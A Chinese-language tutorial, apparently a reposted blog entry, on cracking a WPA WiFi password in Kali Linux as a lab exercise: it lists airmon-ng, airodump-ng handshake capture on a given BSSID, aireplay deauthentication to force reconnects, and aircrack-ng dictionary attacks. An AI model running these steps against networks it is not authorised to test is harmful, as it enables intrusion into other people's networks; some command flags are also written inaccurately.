kali下的渗透wifi实验

实验器材

1.kali linux 操作系统

2.VM 虚拟机

3.附近是否有wifi(这里以自己建立的wifi热点apt 为例)

4.无线网卡rl8187

 

 

操作步骤

1.开始之前的步骤

一般情况下kali linux 操作系统都自带了airmon应用  没有的话 使用自带的软件源下载

apt-get update

apt-get install airmon*

 

 

2.检查无线网卡状态

首先airmon-ng 

检查无线网卡是否接入虚拟机

 

 

输入如下:

3.运行无线网卡

airmon-ng start wlan0mon 开始运行无线网卡

 

 

kali下的渗透wifi实验_第1张图片

4.扫描周围所有的wifi信号

 

输出如下

 

airodump-ng wlan0mon

kali下的渗透wifi实验_第2张图片

 

5.扫描,找到可接入的wifi热点(一般选择有date变化的 表示该热点正在使用流量 这样就可以更加迅速的获得握手包.cap)

这里以自己的wifi为例

输出如下(打开一个新的终端)

airodump-ng -w /1/ -c 6 -bssid B0:E2:35:25:B9:DF wlan0mon

这里要说一下

-w 后面接保存的位置  

 

-c 后面接信号道CH  

 

--bssid后面接指定MAC地址

输出如下

 

 

kali下的渗透wifi实验_第3张图片

 

 

解释一下重要的英文

PWR信号强度

data数据流动

enc无限wifi信号道

 

 

然后等待获取握手包 也就是.cap文件

保存在-w 后面指定的目录里

 

当然 如果等不及的话可以

使用aireplay 发送反认证包

迫使对方重新链接  快捷的获得握手包

这里已经获得握手包名字为3.cap

 

 

6.使用字典暴力破解(把.cap文件放到Home里面 系统默认在Home里)

成功率取决于字典的强度 以及电脑的配置

理论上配置越高跑包的效率越高越能在短时间内获得需要的密码

这里输入

aircrack-ng -a2 -b B0:E2:35:25:B9:DF -w /1/pass.txt 3.cap 

 

kali下的渗透wifi实验_第4张图片

 

 

 

最后得到密码

 

你可能感兴趣的:(kali下的渗透wifi实验)